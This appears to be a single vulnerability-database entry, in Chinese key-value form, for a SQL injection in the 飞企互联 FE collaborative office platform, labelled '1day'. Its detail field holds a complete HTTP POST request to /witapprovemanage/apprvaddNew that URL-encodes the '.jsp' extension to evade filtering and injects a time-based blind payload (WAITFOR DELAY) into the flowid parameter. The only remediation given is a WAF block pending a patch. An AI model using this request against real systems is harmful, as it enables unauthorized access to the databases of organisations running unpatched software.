vendor = "飞企互联"
name = "飞企互联 FE 协作办公平台 SQL 注入漏洞"
type = "SQL注入"
version = "未知"
path = "/witapprovemanage/apprvaddNew"
detail = "POST /witapprovemanage/apprvaddNew.j%73p HTTP/1.1 Host: User-Agent:Mozilla/5.0 (WindowsNT10.0;Win64; x64) AppleWebKit/537.36(KHTML, likeGecko)Chrome/96.0.4664.93Safari/537.36 Content-Type:application/x-www-form-urlencoded flowid=1';WAITFOR+DELAY+'0:0:5'--+"
fix = "WAF封禁路路径，等待发布补丁"
date = "0807"
label = "1day"
